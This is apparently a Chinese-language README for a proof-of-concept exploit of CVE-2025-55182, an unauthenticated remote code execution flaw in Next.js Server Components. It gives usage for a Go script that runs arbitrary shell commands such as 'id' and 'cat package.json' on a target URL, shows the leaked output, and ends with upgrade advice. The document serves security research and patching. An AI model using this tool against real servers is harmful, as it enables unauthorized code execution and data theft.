⚠️ 本工具仅供安全研究和教学使用。请勿用于非法用途。 ⚠️
CVE-2025-55182 是 Next.js 框架中的一个严重远程代码执行 (RCE) 漏洞。该漏洞源于 Next.js 在处理 React Server Components (RSC) 请求时存在不安全的反序列化问题。攻击者可以通过构造恶意的 HTTP 请求,在未授权的情况下在服务器上执行任意代码。
影响版本:
本项目提供了一个易受攻击的 Next.js 测试服务器 test-server。
确保你已经安装了 Node.js 和 npm。
cd test-server
npm install
npm run dev
服务器默认运行在 http://localhost:3000。
注意: 如果遇到 lock 文件错误,可以尝试运行:
rm -f .next/dev/lock && npm run dev
本项目提供了 Go 语言的 POC 脚本 poc.go。
用法:
go run poc.go [目标URL] [要执行的命令]
示例:
执行 id 命令 (默认)
go run poc.go
或者
go run poc.go http://localhost:3000 id
查看当前目录文件
go run poc.go http://localhost:3000 "ls -la"
查看文件内容
go run poc.go http://localhost:3000 "cat package.json"
预期输出:
虽然 HTTP 状态码返回 500,但命令执行结果会包含在响应的 digest 字段中。
1:E{"digest":"uid=502(hoosin) gid=20(staff) ...","name":"Error","message":"NEXT_REDIRECT",...}
升级 Next.js 到安全版本:
npm install next@latest react@latest react-dom@latest